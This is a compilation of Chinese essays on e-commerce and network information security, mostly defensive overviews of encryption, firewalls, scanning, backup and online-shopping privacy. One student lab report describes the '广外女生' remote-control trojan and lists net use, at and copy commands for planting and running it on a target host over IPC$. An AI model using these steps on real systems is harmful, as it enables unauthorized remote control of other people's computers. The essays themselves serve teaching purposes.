电子商务网络信息安全(共9篇)
【摘 要 题】信息法学
【关 键 词】电子商务/网络/信息安全/信息安全技术/数字认证/信息安全协议/信息安全对策
一、信息加密技术
保密性是网络管理系统安全要素的核心, 主要为防止数据被非法窃用或拦截, 数据加密技术是保障信息安全的主要手段。数据加密技术主要分为数据传输加密和数据存储加密。
在保障信息安全各种功能特性的诸多技术中, 密码技术是信息安全的核心和关键技术, 通过数据加密技术, 可以在一定程度上提高数据传输的机密性, 保证传输数据的完整性。一个数据加密系统包括加密算法、明文、密文以及密钥, 密钥控制过程, 一个加密系统的全部安全性是基于密钥的, 而不是基于算法, 所以加密系统的密钥管理是一个非常重要的问题。数据加密过程就是通过加密系统把原始的数字信息 (明文) , 按照加密算法变换成与明文完全不同的数字信息 (密文) 的过程。假设E为加密算法, D为解密算法, 则数据的加密解密数学表达式为:P=D (KD, E (KE, P) ) 。
数据加密算法有很多种, 算法化是信息化社会发展的必然趋势, 是世界各国保密通信领域的一个重要课题。按照发展进程来分, 经历了古典密码、对称密钥密码和公开密钥密码阶段。古典密码算法有替代加密、置换加密;对称加密算法包括DES和AES;非对称加密算法包括RSA、背包密码、Mc Eliece密码、Rabin、椭圆曲线、EIGamal算法等。目前在数据通信中使用最普遍的算法有DES算法、RSA算法和PGP算法。
二、防火墙技术
防火墙技术是指隔离在本地网络与外界网络之间的一道防御系统的总称, 它可以是硬件、软件, 也可以是硬件和软件的集合。在互联网上防火墙是一种非常有效的网络安全模型, 通过它可以隔离风险区域与安全区域的连接, 同时又不会妨碍安全区域对风险区域的访问。
目前使用的防火墙主要有分组过滤防火墙, 应用代理防火墙, 状态检测防火墙三种类型, 并且在计算机网络得到了广泛的应用。分组过滤防火墙作用在协议族的网络层和传输层, 根据分组包头源地址、目的地址和端口号、协议类型等标志确定是否允许数据包通过, 只有满足过滤逻辑的数据包才被转发到目的地出口端, 其余则丢弃。应用代理, 也叫应用网关, 它作用在应用层, 通过每种应用服务编制专门的代理程序, 实现监视和控制应用层通信流的作用。状态检测是直接对分组里的数据进行处理, 并结合前后分组的数据进行综合判断, 以决定是否允许该数据包通过。
三、漏洞扫描技术
漏洞扫描技术是指利用已知的攻击手段对系统进行主动的弱点扫描, 以求及时发现系统漏洞, 同时给出漏洞报告, 指导系统管理员采用系统软件升级或关闭相关服务等手段避免受到这些攻击。
漏洞扫描系统分为网络扫描系统、主机扫描系统和数据库扫描系统三种。网络扫描系统主要依靠安全漏洞库对服务器、路由器、防火墙、操作系统和网络应用进程等进行基于网络层面的安全扫描;主机扫描系统主要是针对操作系统内部问题进行更深入的扫描, 它可弥补网络扫描系统只通过网络检查系统安全的不足;数据库扫描系统是一种专门针对数据库进行安全漏洞检查的扫描器, 其主要功能是找出不良的密码设定、过期密码设定、关闭未使用的账号、侦测登录攻击行为等。
四、系统容灾技术
一个完整的网络安全体系, 只有“防范”和“检测”措施是不够的, 还必须具有灾难容忍和系统恢复能力。因为任何一种网络安全设施都不可能做到万无一失, 一旦发生漏防漏检事件, 其后果将是灾难性的。此外, 天灾人祸、不可抗力等所导致的意外事故也会对信息系统造成毁灭性的破坏。这就要求即使发生系统灾难, 也能快速地恢复系统和数据, 才能完整地保护网络信息系统的安全, 主要是基于数据备份和基于系统容错的系统容灾技术。数据备份是数据保护的最后屏障, 不允许有任何闪失。但离线介质不能保证安全, 数据容灾通过IP容灾技术来保证数据的安全。数据容灾使用两个存储器, 在两者之间建立复制关系, 一个放在本地, 另一个放在异地。本地存储器供本地备份系统使用, 异地容灾备份存储器实时复制本地备份存储器的关键数据。二者通过IP相连, 构成完整数据容灾系统, 也能提供数据库容灾能力。
存储、备份和容灾技术的充分结合, 构成的数据存储系统, 是数据技术发展的重要阶段。随着存储网络化时代的发展, 传统的功能单一的存储器, 将越来越让位于一体化的多功能网络存储器。
五、网络安全管理策略
除了使用上述技术措施之外, 在网络安全中, 通过制定相关的规章制度来加强网络的安全管理, 对于确保网络的安全、可靠地运行, 将起到十分有效的作用。网络的安全管理策略包括:首先要制定有关人员出入机房管理制度和网络操作使用规程;其次确定安全管理等级和安全管理范围;第三是制定网络系统的维护制度和应急措施等。
参考文献
[1]陈火旺李峰李平:网络与信息安全[M].中南大学出版, 2005, (8)
[2]李秀英蔡自兴:浅析网络信息安全技术[J].企业技术开发, 2006, (1)
【关键词】网络 电子档案 信息安全
一、电子文件特点分析
电子文件是高科技产物,是在电子计算机中生成和处理的,它不同纸质文件可以直接“显形”,它依赖于计算机的各种设备、软硬件平台。因此,它有着不同于纸质文件的特殊性质。
(一)电子档案不同于纸质档案最重要的特性之一,是内容与载体的可分离性。电子档案是数字化的形式,其信息内容是可以同它的载体分离的,可以从一台电脑传送到另一台电脑,可以便捷的从一个载体复制到另一个载体。传统的档案与电子档案区别是,电子档案是以数字的信号方式存在的,他可以存储于不同的空间。
(二)电子文件对电脑系统存在一定依赖性。电子档案的生成是在计算机系统下完成的,如果离开了计算机这一载体,电子档案就不具有价值。依赖性具体体现在:数字编码、硬件与软件设备、设备的更新、文档的加密。
(三)电子文件具有快捷性、共享性特征。在计算机环境中,电子档文件可以通过系统进行高效多方位的组合,它真正使传统的文件形式发生了巨大改变。通过计算机,一份档案可以在不同的地方被不同的人同时使用,真正提高了档案的实用价值,突破了传统档案在使用上的局限性。
(四)电子文件载体不稳定且寿命短。电子文件相对于纸质文件而言,对环境温湿度、防磁性、抗破坏、抗病毒等条件要求很高。电子文件很容易被有意或无意损坏,如存贮在磁带、磁盘或光盘等载体上的电子文件,在保管时一旦受到外界干扰或者存贮环境不宜,就会导致电子文件损坏。此外,它的存贮介质寿命很有限,一般不超过20年。
二、电子文件的安全维护
电子文件的大量产生,当今社会经济、政治、文化、自然环境的发展变化,给档案文件的安全保护赋予了新的内涵,带来了前所未有的挑战。档案安全保障体系建设,必须立足主动防御的理念,实施全面系统的防护策略。
(一)保证载体安全
通常情况下,电子档案一般存储与光盘、移动硬盘上,因此,必须建立达到有关标准的适合光盘、硬盘的存储环境。
(二)信息的加密
电子档案的加密方法有很多种。通常采用“双密钥码”方式。网络中的每一个加密通信者拥有一对密钥:一个是严格保密的解密密钥,一个是可以公开的加密密钥,发方使用收方的公开密钥发文,收方只用自己知道的解密密钥解密。这样任何人都可以利用公开密钥向收方发文,而只有收方才能获得这些加密的文件。
(三)防火墙设置
当前许多的软件中都可以将档案文件设置为“只读”形态,在此形态下,使用者只能从计算机上读取该信息,却不能做出任何更改行为。在计算机外存储器中,只读光盘只能供使用者读出信息而不能擦除或追加信息。这种不可更发的方式记录可以行之有效的保持电子文件的原始与真实性。
(四)签名技术
签名技术是用以确保电子档案的真实性,以及验证身份,以此来确定其内容是否被伪造或着篡改。发方利用自己不公开的密钥对发出的电子文件进行加密处理,生成一个“数字签名”,与电子文件一起发出,收方用密钥运用特定的计算方法解码检验数字签名。签名技术一般包括手写式签名和数字签名。作者可使用关闭在计算机上手写式签名,其显示出来的“笔迹”和纸质文件一样,电子文件的签署可以证明其原始性和真实性。
三、电子档案归档及管理中的安全措施
电子档案归档与纸质文件档案归档有很大的区别,电子档案属于数字化信息资源,起存储方式是以数字化形式转存在光盘等介质载体上保存。要确保这一过程,必须在一定的计算机技术环境,采取一系列的技术措施保证下方可实行。
(一)电子档案文件必须是经过审批确认的终版
要鉴别电子档案文件的原始与真实性,必须通过计算机记录系统所记载的形成、修改、批准时间来辨别。
(二)电子档案文件的物理归档形式
现阶段的电子文件归档形式单一,通过逻辑归档功能,把有关的电子档案文件信息传送给相关部门,部门能够查询利用就可以了。因此,对电子文件进行物理归档(即实体的脱机管理)是必不可少的。
(三)检测电子文件的可读性
电子档案文件的存储载体若出现损坏、病毒或者软硬件平台不一致、存储载体的不确定性,都将可能造成无法读取的严重后果。因此,必须对是否能准确读取、存储载体和软硬件平台技术是否一致进行检测术,才能保证归档文件内容的可读性。
(四)保证电子文件的原始性
对于一些较重要需长期保存的电子档案,除了保存好归档的原始格式电子文件外,还要采用其它的技术和方法进行保存:一是将与电子档案相关的支持软件一并保存,并与电子档案存储在一起,恢复时,使之按本来的面目进行显示;二是对原始格式电子文件进行电子图像制作,例如用tif或jpg等格式保存的图像文件,这是保存电子档案原始的可视状态的一种方法;三是对各种电子文档文件,如DOC、WPS、XLS等原始格式文件转换成CEB格式,CEB格式文件是一种对其数字化信息版权加密的安全保护技术,能有效地控制电子文件的复制、拷贝、篡改,现应用于电子政务公文的传递和利用,应推广应用到电子档案的信息管理中;四是保存电子档案的打印输出件或制成缩微件。保存电子文件原始的可视格式是电子文件显示的一种技术,这对提供电子档案信息的可靠性和真实性起到了重要的作用。
参考文献:
[1]肖文建;论网络环境下电子文档信息的安全[J];档案学通讯;2003年01期.
[2]连成叶;论数字信息档案长期安全保存策略[J];档案学通讯;2004年03期.
[3]宗文萍,郭莉珠;论信息时代的档案信息安全保障[J];档案学通讯;2004年06期.
网络信息安全浅析
摘要:在当今社会,信息、物质、能源一起构成三大支柱资源,而其中的信息资源,对人们来说已不再陌生。随着社会的发展,信息越来越显得重要,信息是一种财富,对经济的繁荣、科技的进步,社会的发展都起着非常重要的作用。同样,对信息的保护也是一件很重要的工作。
关键词:信息资源;信息安全
1.网络信息安全概述
信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不可缺少的信息交换工具。然而,由于计算机网络具有开放性、互联性、连接方式的多样性及终端分布的不均匀性,再加上本身存在的技术弱点和人为的疏忽,致使网络易受计算机病毒、黑客或恶意软件的侵害。面对侵袭网络安全的种种威胁,必须考虑信息的安全这个至关重要的问题。
网络信息安全分为网络安全和信息安全两个层面。网络安全包括系统安全,即硬件平台、操作系统、应用软件;运行服务安全,即保证服务的连续性、高效率。信息安全则主要是指数据安全,包括数据加密、备份、程序等。
1.1 网络信息安全的内容
1.1.1 硬件安全。即网络硬件和存储媒体的安全。要保护这些硬设施不受损害,能够正常工作。
1.1.2 软件安全。即计算机及其网络中各种软件不被篡改或破坏,不被非法操作或误操作,功能不会失效。不被非法复制。
1.1.3 运行服务安全。即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测,发现不安全因素能及时报警并采取措施改变不安全状态,保障网络系统正常运行。
1.1.4 数据安全。即网络中存储及流通数据的安全。要保护网络中的数据不被篡改、非法增删、复制、解密、显示、使用等。它是保障网络安全最根本的目的。
2.1 网络信息安全的目标
2.1.1 保密性。保密性是指信息不泄露给非授权人,或供其使用的特性。
2.1.2 完整性。完整性是指信息未经授权不能被修改、不被破坏、不被插入、不迟延、不乱序和不丢失的特性。对网络信息安全进行攻击的最终目的就是破坏信息的完整性。
2.1.3 可用性。可用性是指合法用户访问并能按要求顺序使用信息的特性,即保证合法用户在需要时可以访问到信息。
2.1.4 可控性。可控性是指授权机构对信息的内容及传播具有控制的能力的特性,可以控制授权范围内的信息流向以及方式。
2.1.5 可审查性。在信息交流过程结束后,通信双方不能抵赖曾经做出的行为,也不能否认曾经接收到对方的信息。
2.我国信息化中的信息安全问题
近年来,随着国家宏观管理和支持力度的加强、信息安全技术产业化工作的继续进行、对国际信息安全事务的积极参与以及关于信息安全的法律建设环境日益完善等因素,我国在信息安全管理上的进展是迅速的。但是,由于我国的信息化建设起步较晚,相关体系不完善,法律法规不健全等诸多因素,我国的信息化仍然存在不安全问题。
2.1 信息与网络安全的防护能力较弱。我国的信息化建设发展迅速,各个企业纷纷设立自己的网站,特别是“政府上网工程”全面启动后,各级政府已陆续设立了自己的网站。但是由于许多网站没有防火墙设备、安全审计系统、入侵监测系统等防护设备,整个系统存在着相当大的信息安全隐患。根据有关报告称,在网络黑客攻击的国家中,中国是最大的受害国。
2.2 我国基础信息产业薄弱,核心技术严重依赖国外,缺乏自主创新产品,尤其是信息安全产品。我国信息网络所使用的网管设备和软件基本上来自国外,这使我国的网络安全性能大大减弱。被认为是易窥视和易打击的“玻璃网”。由于缺乏自主技术,我国的网络处于被窃听、干扰、监视和欺诈等多种信息安全威胁中,网络安全处于极脆弱的状态。
2.3 信息犯罪在我国有快速发展趋势。除了境外黑客对我国信息网络进行攻击,国内也有部分人利用系统漏洞进行网络犯罪,例如传播病毒、窃取他人网络银行账号密码等。
2.4 在研究开发、产业发展、人才培养、队伍建设等方面与迅速发展的形势极不适应。
由于我国的经济基础薄弱,在信息产业上的投入还是不足,特别是在核心技术及安全产品的开发生产上缺少有力的资金支持和自主创新意识。其次,全民信息安全意识淡薄,警惕性不高。大多数计算机用户都曾被病毒感染过,并且病毒的重复感染率相当高。
除此之外,我国目前信息技术领域的不安全局面,也与西方发达国家对我国的技术输出进行控制有关。
3.解决措施
针对我国网络信息安全存在的问题,要实现信息安全不但要靠先进的技术,还要有严格的法律法规和信息安全教育。
3.1 加强全民信息安全教育,提高警惕性。有效利用各种信息安全防护设备,保证个人的信息安全,提高整个系统的安全防护能力,从而促进整个系统的信息安全。
3.2 发展有自主知识产权的信息安全产业,加大信息产业投入。增强自主创新意识,加大核心技术的研发,尤其是信息安全产品,减小对国外产品的依赖程度。
3.3 创造良好的信息化安全支撑环境。完善我国信息安全的法规体系,制定相关的法律法规,加大对网络犯罪和信息犯罪的打击力度,对其进行严厉的惩处。
3.4 高度重视信息安全基础研究和人才的培养。为了在高技术环境下发展自主知识产权的信息安全产业,应大力培养信息安全专业人才,建立信息安全人才培养体系。
3.5 加强国际防范,创造良好的安全外部环境。必须积极参与国际合作,通过吸收和转化有关信息网络安全管理的国际法律规范,加强信息网络安全。
4、结束语
随着网络和计算机技术日新月异地飞速发展,新的安全问题不断产生和变化。因此网络信息的安全必须依靠不断创新的技术进步与应用、自身管理制度的不断完善和加强、网络工作人员素质的不断提高等措施来保障。同时要加快网络信息安全技术手段的研究和创新,从
电子商务信息的安全规范
电子商务规范为电子商务提供了最基本的安全保护.通过相关安全规范的制订,可以预先把那些对电子商务活动安全可能产生不利影响的`潜在因素加以防范,起到安全屏障作用,为电子商务活动提供最基本的安全保障.
作 者:李贤民 作者单位:广东技术师范学院,广州,510262刊 名:现代情报 PKU英文刊名:MODERN INFORMATION年,卷(期):27(10)分类号:X913.2关键词:电子商务 安全 规范
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:
“开始”——“运行”——“cmd”
命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系
命令:net time 191.168.12.38 获取目标主机的时间
命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道
命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:
命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。
三、专周小结:
通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。
网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。
网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。
至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:
1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。
2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。
4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。
随着互联网技术的发展,电子商务环境中主要以网络购物为核心形式。在现在快节奏的社会生活中,这种方式正好满足了人们对时间的需求,将节约下来的时间用到做自己喜欢的事情上,这一点是网络购物的十分重要的好处。但是同时,由于人们会浏览各种不同的网站进行填写个人信息以及支付等行为,所以这也就给自己留下了安全隐患。一些不法分子利用这些网站的漏洞进行一些不法的操作行为甚至严重威胁到大众的财产安全,这也是现在网络购物的弊端。本文通过对电子商务环境中网络购物个人信息安全现状的分析,了解在电子商务环境中网络购物个人信息安全受侵的主要方式,并且对如何将网络环境变得更加安全可靠做出详细的分析,找出相应对的策略。
1 在网购过程中,个人信息是如何受到威胁的
1.1 由于网页浏览导致个人信息泄露
在现在网络发达的今天,每天我们都会浏览各种各样不同的网页,并且在浏览网页时都会留下相应的痕迹,从而产生一些浏览过的文件发送到某个服务器上。如果有些用心不良的商家想查找用户的个人信息,就可以通过用户在上网过程中留下的痕迹,对用户进行跟踪。通过用户的上网痕迹了解用户经常浏览的网页,以及用户的消费情况等等。并且,如果用户以前访问过的网站被嵌入了跟踪程序或代码,那么在下次用户再次访问到这个网站时,就有可能被第三方跟踪,从而导致自己的信息被泄露,从而会给一些用心不良的人机会并且给自己造成一些不必要的损失。
1.2 注册新的网站或软件
随着科学技术的发展,各种各样的用户APP也逐渐多起来,通常我们每个人的手机上都会有许多自己经常用到的APP。但是这些APP一般都要经过下载、注册以及登录这些过程才能够使用。在注册的过程中都会使用到自己的一些个人信息。比如:手机号码、名字或者身份证号码等等一些比较私人的信息,以便自己在使用登录时不与别人产生重复。但是,随着现代软件技术的发展,许多这种需要填写自己的私人信息的软件都存在着不为人知的漏洞,这就会导致用户在注册时的私人信息会产生泄露,甚至给用户造成一些影响。比如:去年在我国的很多地区都存在着一些人用赠品来引诱一些学生来注册一个贷款的软件,并且在注册时不仅需要填写自己的信息还要对着镜头点下头。这其实就是一种诈骗行为,利用大众占小便宜的心理,让注册者填写自己的信息并且点头,然后就会有好多人发现自己不知道什么时候带了一部分的款,后悔都来不及。所以在注册软件时,填写自己的个人信息是不安全的。虽然填写自己的个人信息是为了让软件自动为自己提供更好的服务,但这些软件并不能保证不会泄露用户的个人信息,如果有些不法分子有心窃取用户的身份信息,那将会给用户造成比较大的危害,还有可能会使用户失去自己的身份以及自己的网络财产等等。
1.3 网络支付泄露信息
在网上购物时,肯定会经过网络将货款付给商家。现在虽然支付过程中相对安全,但在我们看不到的地方仍有许多网络支付木马来破坏,一些网站通过真实的网页以及地址对用户进行诈骗活动,骗取用户的私人信息以及银行账户或密码等等重要的私人信息。并且这种例子已经发生过好多,并不是十分罕见,这严重的影响了用户在进行网上购物时的财产安全。
所以,在网购过程中个人信息是十分重要的,不要随意将自己的信息给陌生人,以免给自己带来不必要的伤害。在使用一些软件时,不要轻易填写自己一些重要的信息,以免给一些不良用心的人机会。
2 在网购过程中,个人信息受到威胁的原因分析
2.1 缺少相关的法律
由于近年来我国网络购物的人数急剧增加,但国家在这方面还缺少相关的详细的法律。所以导致有一些人利用法律的漏洞来做一些处于法律边沿的事情。由于缺少相关的法律,人们的一些行为只是处于边缘并没有越过法律所以导致了一些不法分子使用网络进行一些犯罪活动。在处罚、维护权益等方面都没有详尽的法律明文,所以这些都有待进一步进行详尽的规划以及思考。
2.2 个人隐私观念模糊
在现在网络环境如此开放的今天,许多人对自己的个人信息安全问题看的并不是很重,觉得应该不会发生什么问题。但是实际的案例已经给了我们很多教训,不时都会有一些由于个人信息被泄露而导致的诈骗行为在我们周围发生,所以我们一定要引以为戒,并且加强我们的个人信息安全的维护问题,以免这样的事情发生在自己的身上。
2.3 网站对个人信息的维护做的不够
由于网购的快速发展,不少商家也逐渐开发出各种不同的网站来出售商品,但它们在网站用户的信息维护上可能并没有投入很多,这就造成了这些网站存在的漏洞。用户在这些安全问题还没有解决的网站上购物就可能会泄露自身的信息,从而被一些有心人利用来达到自己的目的。例如有些不法分子通过攻击这些网站获得一些消费者的信息然后通过各种手段来借这些消费者的名义进行一些不法的行为,这就会给消费者造成比较大的身心伤害,还有可能会给消费者引来一些法律上的纠纷。
3 如何解决这些问题
要想彻底解决电子商务环境中网络购物的个人信息安全问题,就要从以下三个方面进行改进:
3.1 消费者自身加强信息安全意识
要想避免出现一些个人信息安全问题,首先要从消费者自身来解决。消费者在进行网络购物时要注意自己的个人信息,可以通过在计算机上安装防火墙或对计算机程序进行加密等等手段减少自身信息安全受到的威胁。在使用电脑的过程中不随意安装一些来历不明的软件,经常检查自己的电脑有没有一些病毒或者是木马并且尽量减少网络注册。
3.2 购物网站加强自身的管理体系
购物网站的漏洞往往会给消费者带来很大的伤害。所以,购物网站要加强自身的安全体系、技术手段和管理水平,尽量避免泄露消费者的信息,给消费者一个安全无忧的购物环境。
3.3 国家制定相关的法律
就是由于国家在这方面还缺少相关的详细的法律,所以导致有一些人利用法律的漏洞来做一些处于法律边沿的事情。所以,国家应及时的制订出一些相关的法律来约束这些不法分子无所谓的犯罪心理。从而有效防止商家将个人信息用于商业活动,起到进一步保护消费者信息安全的作用。
4 总结
综上所述,消费者个人的安全意识、网站的维护以及建全的法律体系可以相对减少网络购物信息泄露的发生,并且更好地对消费者的个人信息资料进行保护,但我国在这方面的发展仍有一些不足,需要不断的进行改进,才能促进网络购物继续良好的发展下去。
参考文献
[1]赵青.C2C电子商务环境下大学生感知风险的测量及其影响因素研究[D].首都经济贸易大学,2014.
[2]林祥星.网络购物过程中关于个人信息安全问题的剖析[J].信息安全与技术,2013.
一、电子商务信息安全概述
电子商务安全是指计算机系统、通信网络、应用环境等保证电子商务实现的要素不受危害的一个多层次、多方位的动态过程。从广义上讲,它不仅与计算机系统本身有关,还与电子商务应用环境、人员素质和社会因素有关。这主要包括电子商务安全技术、管理制度以及电子商务安全立法等。从狭义上讲,它是指电子商务信息的安全,主要包括两个方面,即信息存储安全和信息传输安全,如防病毒、防黑客、入侵检测等。
中国虽然是互联网大国,但却不是互联网强国,大量事实证明,我国多年来一直是网络攻击的主要受害国之一。据公安部的资料,利用计算机网络进行的各类违法行为在中国正以每年30%的速度递增。黑客的攻击方法已超过计算机病毒的种类,总数达近千种。目前已发现的黑客攻击案约占安全事件总数的15%,多数事件由于没有造成严重危害或商家不愿透露而未被曝光。有媒介报道,中国95%的与Internet相连的网络管理中心遭到过境内外黑客的攻击或侵入,其中,银行、金融和证券机构是黑客攻击的重点,金融领域的黑客犯罪案件涉案金额已高达数亿元。故随着电子商务日益普及,网络安全问题显得异常突出,解决安全问题已成为我国电子商务正常发展的当务之急。
二、问题的成因分析
信息安全问题的出现,既有管理原因,也有技术原因,既有本身缺陷,也有外来因素所致,归结起来,主要有以下四方面的原因:
1、电脑黑客
黑客对于系统和编程语言大多有着深刻的认识,它是指对于电脑系统的非法入侵者,他们对于网络存在著一定程度的攻击性,也进一步恶化了网络环境。
2、计算机病毒
计算机病毒的主要危害在于激发对计算机数据信息的直接破坏作用,占用磁盘空间和对信息的破坏,抢占系统资源,影响计算机运行速度,出现计算机病毒错误与不可预见的危害。人们不可能花费大量时间去分析数万种病毒的错误所在,大量含有未知错误的病毒扩散传播,其后果是难以预料的。计算机病毒的兼容性影响系统运行。兼容性是计算机软件的一项重要指标,兼容性好的软件可以在各种计算机环境下运行,反之兼容性差的软件则对运行条件有限制,要求机型和操作系统版本等。病毒的编制者一般不会在各种计算机环境下对病毒进行测试,因此病毒的兼容性较差,常常导致死机,并且对用户造成严重的心理压力。
3、技术因素
网络软件设计时不可能完美无缺,总会出现一些缺陷和漏洞。这些漏洞和缺陷正是黑客进行攻击的首选目标,而且目前还没有一些技术能提前全部防范这些病毒和黑客。
4、管理因素
用户安全意识淡薄、管理不善是当前存在的一个严重的问题。主要有以下三点:一是一些国家如中国缺乏强有力的权威管理机构,网络安全立法滞后,安全管理部门受人力、技术等条件的限制影响着安全管理措施的有效实施;二是缺乏安全审计,安全审计是把与安全相关的事件记录到安全日志中,但是现有的网络系统大多数缺少安全审计,安全日志形同虚设;三是安全意识淡薄,人们对信息安全认识不够,过分依赖信息安全产品,缺乏细致的内部网络管理机制,一些用户警惕性不高,操作麻痹,甚至把自己账号随意交给他人。
三、电子商务信息安全技术
1、信息加密技术
加密:将数据进行编码,使它成为一种不可理解的形式,这种不可理解的内容叫做密文。解密:加密的逆过程,即将密文还原成原来可理解的形式。加密和解密依靠两个元素,缺一不可,这就是算法和密钥。
2、 数字摘要和数字签名
数字摘要(消息摘要),指采用单向的Hash函数将明文转换成一段固定长度的密文。
数字签名,在数据电文中以电子形式所含、所附用于识别签名人身份并表明签名人认可其中内容的数据。数字签名采用了双重加密的方法来实现防伪、防抵赖。
3、数字证书与认证中心
